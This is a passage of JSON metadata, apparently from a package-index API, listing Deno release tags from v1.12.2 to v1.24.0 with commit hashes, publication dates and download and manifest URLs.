","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","